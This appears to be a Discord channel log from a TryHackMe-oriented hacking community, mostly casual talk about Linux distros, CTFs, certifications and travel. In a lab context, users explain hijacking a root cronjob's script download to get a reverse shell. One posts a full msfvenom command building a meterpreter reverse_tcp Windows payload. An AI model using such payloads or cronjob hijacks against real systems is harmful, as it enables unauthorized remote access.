#general

LMAO

Embarassing

There it goes.

You doing this on Linux?

Tails live boot, yup

time it

Then you'll remember for next time.

🫡 thanks

Gave +1 Rep to @sick lance (current: #1 - 2444)

Oh you're booting it from a USB?

Yah, live boot Tails, no network connection, no hard drive. And unknown DEFCON 31 USB in the laptop too

ooooh

hope for no firmware bad ness

Was talking to Toaster, it looks to be a grub loader script. I'm checksuming the iso's, see if they've been tampered with

Nothing on surface level, was reading through the files

Even so. This laptop is JUST a live boot, for defcon, kinda laptop

yeah having disposable stuff for defcon sounds sane

What directional arrow key would we use to navigate down the manual page??

same way as people recommending having disposable phone and computer for going into china for some reason

Down

down arrow.... j key.... page down

don't do this.

oh 😦

I wasnt asking for the answer I was just making fun of the question lol

most man pages use less as a pager nowadays and that supports vim keys for navigation

@sick lance you don't, by any rare chance, have a text document full of checksums, do you?

https://sange.fi/esoteric/brainfuck/impl/interp/i.html

so that is how you spell esoteric

thank God

Gave +1 Rep to @shut hawk (current: #14 - 537)

for that link

sure thank you too Jay

hey guys i'm stuck here
where is
http://ip/

i have ascended

have you deployed the machine?

tried dcoder, CyberChef

i mean when you do an http.server with python

where is /

went back to the ftp server and got the file again just to make sure

i'm in the machine already

wdym?

how can i explain it

is python3 -m http://"ex" port

if I am not wrong

No

nah it is python3 -m http.server port

from there any ip linking to your pc which would be 10.x.x.x

for tryhackme works

exactly

i hosting an http server
inside the machine there is a cronjob that exute a bash with root priv
and it don't use ip it use a domain
like mkingdom.thm
so i replaced the local host ip with mine

Python3 server for CLI.

Updog for GUI.

short and to the point

so you would then run wget http:/10.x.x.x:8000/listofdirs/file.txt to download files from it

and it's showing me that the machine is requesting a file

updog > py3

but i don't know where to place it into my machine

100%

2 way transfer is a massive bonus.

check the script and then from the folder you are running python3 -m http.server in make the dirs and file that it is looking for

aw nice

f

GET /app/castle/application/counter.sh HTTP/1.1" 404 -

i'm hosting the http.sever in the descktop dir

neat

and there a dir called app/castle/application with a file counter.sh in it

GET /app/castle/application/counter.sh HTTP/1.1" 404 -

file explorer too for selecting files.

adn it's showing me this

@sand trench

I mean, I'd hope that's how you select the file lol

you can see who accesses too.

Incase you post a link in this server and more than one person clicks it.

@cosmic pendant Did checksum:

Kali: Safe
Pentoo: Unknown
Ubuntu GNURadio: Unknown

@boreal scarab check your DM 👀

Boi

That Ubuntu GNURadio screams custom, so, checking that as unsafe.

why i can't cat command a root file when i'm root

yeah in the folder where you ran the python3 -m http.server command make a nested dirs and file like this mkdir -p /app/castle/application and then touch counter.sh and finally make a rev shell command in counter.sh

and it's permission denied

i got it thanks

Gave +1 Rep to @sand trench (current: #4 - 1780)

because the suid bit is set on the cat binary

use alternatives

Nice!

less

seems good

why does this sound very familiar?

CORRECTION: Ubuntu GNURadio is safe, but that pentoo is still unknown

because it is the thingy for mkingdom vain

OHH

YES!

Thanks shadow 😄

no problems

idk

its a room

called mkingdom

yeah, I remember now

screw VMs, I'm going for WSL on my laptop

Damn, pentoo really is elusive. Can't find a sha256 of it. There is an SHA512 on distrowatch, but links to pentoo with a broken link. Download link for that version of pentoo cant be downloaded from pentoo themseleves.....

https://tenor.com/view/rabbit-hole-alice-in-wonderland-fall-roll-gif-9377042879026695800

waybackmachine ?

Doubt it, but worth a shot

yoo

if i was able to find hannah montana linux .iso then you will find your ting

Nope, atleast for the official download link, only captured once in 2022, and brings you to a "GONE" page

if you get sha256 by you own, try google ti

Well good news. I got the DIGESTS from wayback machine. Bad news. I gotta sha512 the iso, not 256

lmao just saw it

does this server offer Vouchers or giveaways...

thm site does

giveaways from time to time from users

All iso's appear to checkout for sha256/512. Still not touching that with a 10 foot pole, but cool nonetheless!

ye cause ima need 1 of them fr cause i got 4 bucks in my acc

well... you can do free rooms and so

kinda tryna continue the red team course

Fun fact... I've seen that used in prod

It was yours, wasn't it?

Nah
System at uni

https://tenor.com/view/brooklyn-nine-nine-terry-jeffords-why-b99-brooklyn99-gif-21715381

that's joke? right ?

Afraid not

It was set up up by a former student when the lab was redone, presumably as a laugh lmao

what in the fresh turkey???

So, TL;DR: the main NAS for that course... Ran on Hannah Montana Linux

NetBIOS name was HANNAH as well lmfao

i ahve it in VM. you even can't update/upgrade it any more

Doesn't surprise me

It's an ancient Debian fork iirc

i think is 8.4 iirc

Lab-prod?

muiri! you're blue!

I mean, it hosted all the coursework and downloadable contents, and wasn't in scope for any attacks, so I'd call it prod prod

you're blurple! *

It did live in the lab network though

idk how stupid that is, but ain't smart 🙂

Lab prod, so it's not business critical or subject to the regular audit processes 👀

Oh Lord no

Well, business critical to that one course tbf. The lecturers would have a bad day if it went down.
Not to the overall org though.

whats better blackarch or kali

kali

why

well... at last it's ppl most choice os

hmmmmm weird problems hmmmm

it have all the tools you need for most of the time, and if you get full iso of alike 10gb you have all the tools

both are good, blackarch has more tools but tbh its useless

thingy works in terminal

thingy not work in lf

shadow dunno why

Agree...I mean seriously, what a huge iso file!! Bunch of unnecessary tools...only can eat your drive..that's all

aaaaaand just figured it out

missed the --polite on flag

indeed... you can use kali default iso. or also full install one of 10gb iso

apparently a chafa update made it require that to work in lf

blackarch is a mess with some updates and handling of some of the tooling

Why.... WHY ARE YOU USING BLACKARCH

do I add -R after rm only when I want to remove a directory?

shadow is not

they tried for a bit in a vm

Ha..ha

after dealing with how they handle impacket

never again

Pentoo!

lmfao

that was a quick trip down memory lane

I died when installing black arch...then died the second time when trying to figure it out, then died the THIRD time when trying to use it

When you clean out recycling of 86GB worth of files. And your C drive goes from 5 GB to 19 GB.... yah, math checks out

i got one screw extra after assembly =/

Nah, that's just your screw loose.

i hope you right...

Welp, time to try out pentoo

I installed Blackarch 4 years ago...in my old laptop...after installation my laptop never wokeup and Blackarch too...

huh apparently something is whacky with tmux and chafa sixels inside of lf

some images don't show up

no major issues

anywho, I'm gonna hop off ya'll, have fun!

have good sleepies vain

Hello Pentoo

is pentoo gentoo with pentester tools???

hello

Anyone having any idea why am getting error running hashdump?

Am I supposed to pass any argument?

is it run must be there

And why does hashdump --help give me hash value

?

It tells you that you have the wrong number of arguments.

Is this for a THM room?

I understand that but argument am I supposed to pass?

Yes, don't say go discuss in room help

As I have solved the question of room

I am asking out of curiosity

Have you conducted a query utilizing your favorite search engine?

https://www.utc.edu/sites/default/files/2021-04/4660-lab6.pdf

I did found this but didn't understand it fully

Because I found potential solutions that may answer your questions

Please share

I hate gentoo, sooooo much

Jesus, no systemctl, uses rc-service. And portage... over apt, dnf, pacman

I'm trying to get you to conduct research. I googled the exact error shown in your screenshot and information is popping up.

Alright let me google the error

Instead I googled hashdump docs

So that I could understand how it funciton

And found the link I shared above

I'll give pentoo this, it's colorful. But commands... 🤮

None of them make sense to me still

There is some github results about the same... But it seems like they are way too professional for me to understand their conversation

Hullo

Is there any chance you can summarize or help me with other resources... Am not being lazy I spent hours solving the room question and then I asked you this after I solved it because I couldn't find any good resources

Anyone else facing issues with burp browser on Ubuntu 24.04?

I'm not sure what you're looking for. From the summary reading I did, it was an error in the program, and they patched it.

But am still getting this error

Did you do msfupdate?

Also when I looked for help I got hashes

Which was the ans of the room question actually

Which is quite weird in my opinion

No... Isn't attackbox updated?

I don't know what version of metasploit they're running. It can't hurt to run it

Do you understand the purpose of hashdump?

well you can get systemd in gentoo

It's whole job is to dump hashes

I shall suffer. I can't even get lynis on it right now, it's being a pain

Pretty much yes... Its allow you to get the login info from the compromised machine

what distros do y'all use and if so why?

afternoon hackers, how is the learning going?

endeavour os
because it is more or less mainline arch with easy install in gui and an extra repo to handle nvidia drivers

Budgie.. is stable and runs my old games no problem.

windows, because it just works with what I need

I use Arch btw

nice, rn i'm running mint but i accidentally rm'd my home drive so gonna move to fedora LOL

Ayyyy let's gooo, lynis is installed. Now let's see what it ranks for pentoo

who won the google ctf yesterday?

there's still 36 minutes left

currently its kalmarunionen

63 lynis score on Hardened pentoo

also known as team kyootybella

https://www.kalmarunionen.dk/posts/about/

Breh... there's a team called "Google only hires skids"
They're ranked 37 with only 7 flags

Fedora KDE cause it just works

budgie FTW

nice rice

old laptops love Budgie, that along side some emulators and you have a great school laptop.

true. is rly run great in general

48 hours almost done

brain is deaaaad

no sleep ?

you can do it!

i was thinking ab installing budgie onto my thinkpad actually

what are we talking ab?

do it, you wont regret it, it evens has regular updates like a popular OS.

is it stable or bleeding edge?

stable prolly ye?

based

@loud marlin get on my level

i've transitioned from win like a month ago

lol Gentoo!! youre just in that cyberpunk vibe

my dream is to be able to set up gentoo in like 6 months

when i learn how the linux system works

I do kinda love all the colors. But that's all it's got going for it

btw how do i verify myself?

ty ty

Alright. I love pentoo. Still hate how to install and update it, but it's got ghidra and Terminator on here by default. AND Yubikey manager

/verify token

something for everyone

Excuse me, is this an update, I don't understand how to answer this question

It looks like drag and drop matching, but for help with THM content, #room-help is the best place to receive assistance

hey guys

how much knowledge should you have before playing king of the hill?

why i have this in my openvpn file

WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this

Whenever you want

Im a beginner

It may not be fun in the beginning, but it will expose you to different content rather quickly.

If you're a beginner, you can go to #start-here

is there another learning path after the "Pre Security" ?

oh, lots of sleep

just some sickness arriving as well

Yes, there are many

and body breaking down due to overused

at what stage would you say someone would be ready to play king of the hill

Again, whenever you want

fracker... go to sleep

I mean obviously a beginner wouldnt be able to do nor understand anything

Fight me! Pentoo looks better!

keep ly to you self

Look at this nano!

Look how pretty it is!

You're asking a question with no definitive answer. It depends on how fast someone learns and how someone wants to learn.

YAY new catppuccin colloid version working just perfectly

colored nano is nice yes

Very nice. Now image that but in terminal all the time when you run commands

Like I said, you can go do it now, you probably won't win but you will gain some level of knowledge through participation.

alright

what kind of emulator are we talking about?

emulators are nice but dumping games yourself is hard and the only legal way

i can send friend requests on thm now??

Zsh, with gnome, noice

You've been able to for years.

i must be living under a rock

I honestly don't want games on my laptop haha

i dont see the friend request thing

yeah, I like GDM, that's why I run gnome 😄

Didn't you upgrade your PC?

it's 2 years old, and I got it used

for college

got money too yes... waiting for kitchen remodling before buying and building

what are friends able to do

anything I can hack on and take notes, and meet all class requirements is good

I just tried to join a public game and it said " Only intermediate and advanced experienced leveled users can play King of the Hill."

when do I get that "title" of an advanced user ?

oh k

change it in your profile

well gba games should work even on very old computers no problem

I have another PC for that haha

built it last month

T-6 minutes

who knows the game agario

took bella's suggestion and went with a 4070

it gonna be close

When finish Spider-man

Is that google CTF?

yeee

how long would you say someone should learn with tryhackme to be at intermediate level?

niiice

Don't know lol, been hacking a lot

Woah congrats, pretty nice score

ranking up

thankz

¯_(ツ)_/¯

Thank you very much haha, I'm glad I went with a 4070

Gave +1 Rep to @chilly veldt (current: #7 - 846)

eh gotta get your priorities in order

👀

yeah, doesn't hurt your wallet as much while still giving you a lot of power

whenever you feel comfortable

exactly haha, I love it so far

shadow is planning on going for a 7900xtx as their gpu

gotta get a compressed air blower soon so I can start cleaning my PC properly

you're on Linux as your daily driver right?

yuup yuup

I feel lost honestly I see other people using kali and some tools and I cant imagine myself doing all of that. yes, Im a beginner and I cant just understand everything right away but Im still unsure if tryhackme is actually a good resource to learn ethical hacking

get one of those cheap electric ones instead

ah, AMD would be the better option

ooh, yeah

pretty cheap at 5$ a pop

pretty big for 5$

shadow, you ever considered making your own distro

i.e a can of compressed air has limited useage time

wait...that's a leaf blower...

a handheld electric blower can blow tons more air before it breaks down

aye

yeah but usually on a lower pressure

yes considered it... not gonna do it

still works

well, leaf blower works too

well depends on which you get

I'm on windows for a while

using WSL with kali and kex

https://www.youtube.com/watch?v=Iupm6KkA4WQ

if it works out, I'll stay on windows

can tryhackme actually teach me how to become an ethical hacker if I go all in withing 2 months?

if not I'll have to switch to linux soon

Okay wow

I'm definitely getting a leaf blower

yes but be careful of burnout if you gonna study that hard

I was joking

well they work

a compressor could also work if you need lots of air at pressure

yeah thats what Im afraid of but at the same time I have the motivation and its not like Im forcing myself to study, Im enjoying it

I just wanna know if Im gonna see results if I just do it

you can ping me haha, you don't have to do a silent reply

for at least a month

I tend to scroll past anything that is not yellow or directly underneath my message

oh for sure... just compare yourself after to yourself now

Just use default always

Hi there hackerz. Do we have the ability to share open source projects that we want to test out so that you can try hack them? Cause that would be aweome!

default is no ping and just reply?

depends

i guess i need to do some cpu overclock on work using cryogenic cooling system...

sometimes it does, sometimes it doesn't

What's cryogenic again

Hmm

Thought it was a movie word

you will, I am a complete noob but I still feel I learned alot, enough that I plan to take security+ test next week with all ive learned.

-200 and more c

how long have you been learning

Wait, try it out on a normal CPU

and tell results

Ive been going no stop 6 months so far for reference

would it even survive

things like liquid nitrogen

it will froze instant. i guess.

the major problem with using a computer that you put in liquid nitrogen is the problems of condensation water droplets

can you fully work with linux and use hacking tools?

learning linux good enough to use it only took shadow a month

to learn a lot more in depth took longer

I am doing the THM stuffs on ubuntu so that I learn linux too along the way

yeah I mean I know my cat, ls, whoami and how to install stuff, not going to lie when it comes to using tool on a terminal I still have cheat sheets and right now I am comfortable with Burp Suit also, so hopefully with a sec+ cert I might be knowledgable enough for a jr position.

how long have you been into cybersecurity?

yep. the issue is condensation. even if you use ammonia. you need to be inside dry enviroment and that any cooling liquid do not flow outside

so called closed system

for longer then tryhackme has existed

with the knowledge that you gained in these 6 months can you compete in king of the hill and other games on tryhackme?

well, you got me there, I haven't tried yet, I guess that is one of the next steps I need to take.

have you been consistent the whole time and made your best or was cybersecurity like your side hobby?

more like something I fell into, Im old.. from the 4chan times and sometimes tools would just fall on your lap, tools like "LOIC" but using these tool doesnt make you knoledgable, like I didnt know anything about networking so now I am hoping to make it my carreer and all I do is study.

goodluck man

What is this error?
Error: Permission denied @ rb_sysopen /home/user/THM/shell .exe

Got this when trying to generate a payload with msfvenom, (even with root permissions)

I asked chatGPT and all it says is that its a file access error in ruby..

the space at the end is the problem

i.e there should be no space between shell and .exe

The original command had no space. I got the space from the "text extractor" tool that I copied the text from.

then it might be that your user is not named user

Yes, its named my name. I replaced it with user for privacy reasons.

The exact command I used:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.**.*** LPORT=5566 -f exe -o /home/*****/THM/rshell.exe

[ I added the *** myself on discord. ]

#room-help

¯_(ツ)_/¯

Hello 👋

Ello mate

Just noticed I forgor to link my account xD

no idea what that means

This is train restaurant service.

Linking this Discord Account with my Thm Acc

to where? i think i need that ride 🙂

didn't know you could do that

That looks dangerous for a train

is there any perks of doing it ?

Yummy

Hungarian EuroCity from idfk where to Hamburg.

You can post screenshots and access the vox channels

cool

Denmark?

I mean, yes, but this one rides like butter

And you get to show if ur a subscriber etc

cool

Also vanity roles

https://tenor.com/view/drink-water-thirsty-fumbling-gif-10195256

Nah, from ... Prague, maybe? I'm unable to figure out where EC172 started its journey from right now, but the comfort is something rlse.

I see

EC172 is hungarian.

Where the heck are you going?

That train service is not Danish lmao

Hey, there is some path missing on THM from what Shadow has pinned here

Any idea why?

Some paths were added to THM after that message was pinned.

Am saying some are actually not available on THM

And is pinned here

At least as long shadow hadn‘t had pinned yet another one.

Which path?

Pentest plus

I couldn't see it

You know life is good when Ctftime is saying nr 1

Are you in ?

Yes

Been since '22

Cool

Thanks

I joined thinking it was more than a CTF team then I kinda abandoned it when I realised it was just that 😂

It's still available

Where to find it?

Oh? Fair but yeah, we do mostly CTF

Yea

It's on TryHackMe, you can utilize the search bar on the site.

Guessing you don't do much in CTF?

Kaiserschmarrn!

On a train!

And it tastes fucking good too!!

Is coptia pentest plus and pentest plus same?

Looks like pancakes

Nah, not really my thing 😂

yes

Yes, Pentest+ is an exam created by CompTIA

Fair fair

comptia is the organization pentest+ is the cert

I have the biggest craving for beer now kekw

Heheheeheh

And all for 8,70€, which is cheap for nearly 2L of beer.

Thats how its named... Got it now

For a train that sounds more than fair

Very

Total meal with beer and goulash soup and Kaiserschmarrn ran me 20€.

I am used to paying about the same for far worse quality with Deutsche Bahn.

Oh, and the plates were served. No bistro bullshit like ICEs. 😄

Hi

👋

Time to setup a new thm vm 👍

Thanks for the nudge to get one, it's goooooood

Gave +1 Rep to @valid mauve (current: #65 - 110)

@blazing granite translator!

Ahh nice!

I love my KDE Plasma

uboonga

shadow is too deep down the linux rabbit hole and is now mainlining window managers

the black letter on the yellow background it says spring, it's not a translation actually says spring in hebrew letter 🙂 the other line on the bottom is the flavour and says grapes

Spring Grapes

boing boing boing goes the springs

or are they more like slinkies????

Have fun!

spring is the brand, grape the flavour of the drink

I know that, that's nutrition facts, I just csnt read it. And frankly don't care what it says

the first one on the circle it says that doesn't contain any additives, the second one is nutritional info and the content that is 330 ML

Totally know what that is in freedom units lol

point 3 repeating or shadow walk

Non english

9.5, 2.5 and all the other are in grams

The can kinda reminds me of fanta

That I understand. Thanks

Gave +1 Rep to @blazing granite (current: #73 - 86)

Standard can size

~12oz

330 ML IDK what is that on oz

fluid ounces or none fluid ounces???

Yeah, it's ~12oz

bit shy, closer to 11.5

That's why I used ~

330 milliliters ≈ 11.15862749 fl_oz

Also rounding lol

12 oz is 355 ml

US or UK?

roughly a half pint

¯_(ツ)_/¯

(they aren't the same)

half an imperial pint

3/4 US pint

It's 100ml less than a pint

Welp, train is delayed, we are waiting on an ambulance

imperial pint is 20 oz

what the f-- is a kilometer?! HWAAAAAK 🦅 🇺🇸

oh noes did someone cross over to the other side???

Pint here is 473ml lol

something that regular people use to measure distance 😂

accident?

Oh no!

https://tenor.com/view/sfm-soldier-tf2-meme-american-gif-24728385

Idk, we just had it announced

No, someone sitting in the train

@blazing granite very... watery? But also quite grapy. It doesn't sit on your tongue, so the flavor is when you take the sip

I've seen in in the supermarket but I never taste it, I don't drink those kind of things, I only drink, water, natural juices and alcohol, none of that sh*te

Well, this isn't really what we would classify as soda. This is more watered down juice?

It's so hard to describe

....

cross over to the other side == dead

flavour water or something like that

Possibly

#room-help

Also

If you setup different DNS on your router's LAN connection, then yes. If not, it uses your router's IP as it's DNS

Yes

@nimble timber i got it nice trick for the root 😉

I have a PiHole, so on my router's UI in LAN, I have my PiHole's IP and Quad9 as backup. But you can also specify what DNS you want to use, either in windows or linux

and without changing basically any router config for dns the router uses your isp:s dns server most of the time

Yes. If you specified another one in your router's UI, on windows, or linux

"Ooh shiny" mixed with frequent rewards for that sweet dopamine boost

Can confirm

.... damn pentoo really is locked down, can't even use pip to install pwncat-cs

ahh, powershell vs bash

Thanks!

Gave +1 Rep to @sly pilot (current: #2107 - 1)

Bruuuuh. Follow Gentoo's instructions to setup a virtual environment to install pwncat-cs and it's giving me the same crap

What's it related to?

Better question is why do you think it might be D?

What do YOU think it is?

same vibe

I guess.. I use the two interchangeably

tries to only use copyleft things

Domain Name Service/Server. I think it's Service, but ye.. DevOps be lazy

source image for that btw

flashcards would be helpful for you if its just memory stuff like that

Minecraft hardcore world where when one person dies it ends lool (Explicit Language)

unfun fact.... plastic man does not wear any clothes and instead just "shape" shift them into existance

Think about the time series of events that happen when you plug in an ethernet cable

A ...but u got it?

that's part of the superpower

goated

If your PC knows nothing, it will need an IP and also DNS and other things

It can't get a DNS address from a DNS because well it doesn't know where to find one

So it would have to get that info from DHCP

or have you manually asign it

Exactly. The question tells him anything he need.

jarvis change his host file to redirect to bing instead of google

Exactly 😄

that is harder then you think

obviously

but jarvis isnt real

as both services have tons of ip:s used depending on your region in the world

that laugh at the end tho 🤣

😂 😂

we spent a total of an hour looking for a nether fortress

can shadow have a glass of cranberry juice instead???

fr?

hence the pain in my "nooo"

sprechers rootbeer ontop

Now he must

Good luck

Can I ask, @rapid merlin.. Are there any specific reasons you're doing A+?

Gave +1 Rep to @shadow loom (current: #397 - 12)

it tasty

Gotcha

Well glhf.. Feel free to ping/DM if you think I might know the answer

You work for (if you r not cheating on thm server ^^ ) so you deserve it

I never did it myself so I can't help with the exam specifics, but the theory I believe I've got a fair grasp of

No. I was jokin' . It has nothing to do with you or your level.

I hunt certs as well cuz i have no degree or something like that.

In all fairness progressing at THM is fairly easy so don't be disheartened

Thats even worth a beer 😂👍

(Rank 3 to 4 is like one hard challenge and an easy)

You mean you haven't tried that to see definitively?

It's very funny

I remember the days when you could get 0xD in a couple of days with minimal effort.

That's literally how long it took me back when there were only 70 odd rooms

If that

"Top 1% THM" still is the best brag

You seen the buzz light-year meme of that?

No

Will try to find it for ya

We weren't allowed to make fun of THM remember

😂

(Or rather I/we didn't allow it)

There's a better one than this
Same format though

HAHAHAHAHA

That's the one

HAHAHAHAHA 😂 😂 😂 😂 😂

Yes we all heros cuz of nmapping nasa but the girl don't care 🤣

AMAZING

im biased, but I think the no text at the bottom makes it funnier :P

Same

Lotta props to THM otherwise, but the ranking system isn't the most relevant in the world

Agreed

I was motivated... until now.

@royal gazelle Hey, coming to Defcon this year?

If they allowed you to sort the ladders by "points/rooms" it would be more relevant

Honestly, I literally see that as a red flag on a CV, unless it's an intern or someone applying for a very junior role.
Like, if that's your frame of reference for things to make you stand out, then that tells me something about whether your finger is on the pulse...

There are people in the top-50 list with 200 fewer rooms solved than the number 1

Or something along those lines

But IMHO that's more impressive because "points per room" is higher then

That and there's a tonne of bots + users who never actually do anything

Or, were, once upon a time. Dunno if that's still the case

Yeah.. THM is a great platform for beginners but I would frown if I saw it mentioned as something that made the person stand out

I'd say look at the forum, but they nuked that a while back. Used to be chockablock with spam comments

These days if you wanna express yourself you gotta do it with your annual activity heatmap

Because they can claim to be top X % in the world and get a job

Or they hope to be able to..

I think THM made a small change that means in order to count to the % you have to have solved at least X rooms (to prevent against bots)

Not sure how much of a dent that made

You need 100 points IIRC

Noooo. I would fall back to 10000 🤣🤣

Or wait, to get a pct? Yeah dunno, but more than that

Exactly. If I saw an incoming intern or a graduate going for a junior tester position, with a list of their THM completed learning paths in their extra curricular section, I would be delighted. Gives me something to talk to them about in an interview.

Gets significantly less relevant when you have actual experience.

Muiri which of your Chinese New Year boxes should I do first?

Anything but Rabbit. That one is just embarrassing

Pentoo... the only damn OS that you need to setup a python virtual environment to use pip...

Jellyfish is the best imo, probably followed by Dog, then Pig

But it's "easy"

good tbh

Yeah, it's CTFy bullshit from before I knew what the difference was

No. It's a great platform and idc bout rankings but there a companys out there where you can say "I do try hack me" cuz the know its great for fundamentals.

keep your environments in check

pipx is also a thing

Staying clear of that....... 😂

I do like it, but it is a bit tedious

Yeaaaaaap. Fox isn't much better. That's a sadistic one

Pig is getting there, Dog I actually still kinda like, and Jellyfish is okay (imo)

@shut hawk (Explicit Language)

mkingdom was juuuuust enough CTFy for me... More than that and it just becomes a bother for the sake of pranking the user

I've not released any of the new ones publicly though 😦

LOL

Yeah, uh, try Fox if you're in the mood to be annoyed

https://tenor.com/view/skill-issue-urge-resist-cat-gif-25536160

I will call you up on discord and yell at you most likely

Minecraft Hardcore with more than one person is too difficult 🤣

That one was deliberately built to be as irritating as possible because it was part of a competition and we wanted to draw it out for as long as possible

There are.. better strategies

make a "year of the rat" 😛

See, this is why THM got shit back in 2019's.... 😂

Username is Jayy

JAYY IS THE RAT!

I've got an ancient cherry tree doc with the plans for that...

tbf I wouldn't last 5 minutes LOL

https://tenor.com/view/mob-gif-5168420

have you not migrated everythign to trilium?

Just like Waltzer from HTB... "GUESS THE ALGORITHM x3" crap

Yeaaaaaaaap, can't dispute that
Glad to say I've grown up since then.
My latest challenges have all been internal for work, but they are lethal in comparison

God I still hate Waltzer...

Even after all these years

Are u from europe?

My main notebook, yes. I still keep projects in cherry tree docs though

You should make an Insane++ box for THM

So my knowledge base is trilium, but pentests, CTFs, dev work, etc, are cherry tree

Ah fair enough

any particular reason why?

Tempting... jayy, remind us, how far through did you get with my Gauntlet?

After that skull crushing windows issue? 😂

I only got initial access to the first stage, didn't go further

I like to keep things compartmentalised. My main notebook is way too big to fit in a cherry tree file now -- that's the only reason it's different. I just really dislike mixing things together.

Got ya, understandable

Unfortunately i got no room for you but u remind me of my tasks

For reference @shadow loom, I built Gauntlet about three years ago. It's a pivoting challenge, primarily. A docker network with 6 layers in it, each harder than the last (following the video game Gauntlet Boss format), but actually using realistic movements and LPEs

It's funny, I still remember the exact exploit - when I was developing my own program with that lib, my brain immediately went back to it 🤣

No one has every got past the initial access to the first container.

And only about three people have got that far, Jayy being one of them

SQL injection leading to abuse of PL/SQL stored procedures to enable a test instance of an API which leads to RCE as an unpriv user in Windows with Defender for Endpoint enabled and fully patched and then some easy to locate but hard to pull off obscure privesc
@pallid lotus

... We've brought it back for three consecutive years at the conference

Oooh fun!

I love and hate it 😆
Is this a concept or something that's been made?

PWK for me

No I just made it up

Year of the Birbs, when?

Wdym? That makes sense

PEN-200 or whatever they call it now. OSCP coursework

Same for me ^

I'm looking forward to the exploit development room, ive gotten most of the way there, its just the last part i need help with

But I never got further than stack based BOFs

Dooooo iiiiiitttttttt

My life was too short, I thought to my self

That one actually sounds fun, although you'd struggle to get MDE on a CTF box

True

Could do like a parrot that echo's stuff back to you and somehow abuse it to echo bad stuff

Aight, Noah bedtime... Back in a bit

What, like an LLM test?

...yeah I just realised that is exactly what it sounds like LOL

Done way too many of those recently

ParrotAI

OH I GOT IT MUIRI

my condolences

You need to train your own LLM for us to hack

It'll be fun

Maybe slightly expensive...

BUT FUN

good night

well ollama should be installable on vm:s and can probably ship on a tryhackme target machine

dunno how you would exploit it though

Wanna bet? I'd love to see it run on half a gig of ram ..

well think there are some of the super tiny llm:s that are installable through the ollama tool which could run on a raspberry pi at this point

so sure can take that bet

what do you wanna bet for it???

Well that I need to look into

might not run fast or very well but would assume they can run

That said, are we talking a Pi 0 or a Pi 5 with 8Gb RAM

was thinking pi 4 with 4 gb ram

Finally at my train station 27 minutes late

Which is 8x the resources of a free tier THM box...

hmmmmm: https://ollama.com/library/tinydolphin

yeah fair.... not to much insight into the exact system specs of a thm box

t2.nano free, t2.micro sub, unless that's changed

https://aws.amazon.com/ec2/instance-types/

better late than never 😂

also if shadow recalls correctly during advent of cyber 2023 there was a "chatbot" that we got to hack

not a very good one

there was, it wasn't an language model though

¯_(ツ)_/¯

guess shadow can claim that muiri beat the bet

so here is a cooctus for muiri

@chilly veldt Soooooo. Whatcha win?

yes it is possible.... though no idea how hard it would be and what would be required to get there

Google CTF

It's 11:22pm

And I got work tomorrow

Well I know that, I meant the prize. If any?

A trip to Malaga to play finals

Nice!

Congrats!

https://tenor.com/view/wedding-crasher-hro-gif-25636997

bella getting a job at google after winning google ctf???

No

For your whole team?? That's a lot of people

Thankz, there's also a prize for winning quals, but that's the team

No as in, it's not an option, or no, you wont even think about the offer?

No as in, I ain't applying

Ahhh

4 people, but the team is paying for multiple others

yes and they are not the only huge corpo doing it

Yes, they do, they have a beginnersquest, yearly CTF and hackceler8 and also v8ctf

V8ctf is a 0day CTF on their browser engine

Have a look, it's not b2r challenges like you're used to on thm
https://capturetheflag.withgoogle.com/beginners-quest

Ahh I see

Jeopardy themed

Only 4 players allowed to be onsite, but we plan on going there as the team cause we didn't qualify for Defcon this year

Damn thats so cool

To all the Scandanavians, Skål!

Hackceler8? Yes, if you click the back button on beginners quest site I sent, and press "hackceler8" there's videos from last year's competition

Hackceler8 is the CTF finals that google has made, it's a game hacking finals that runs in a football tournament style, with 8 teams playing some qualification rounds, then its bracket style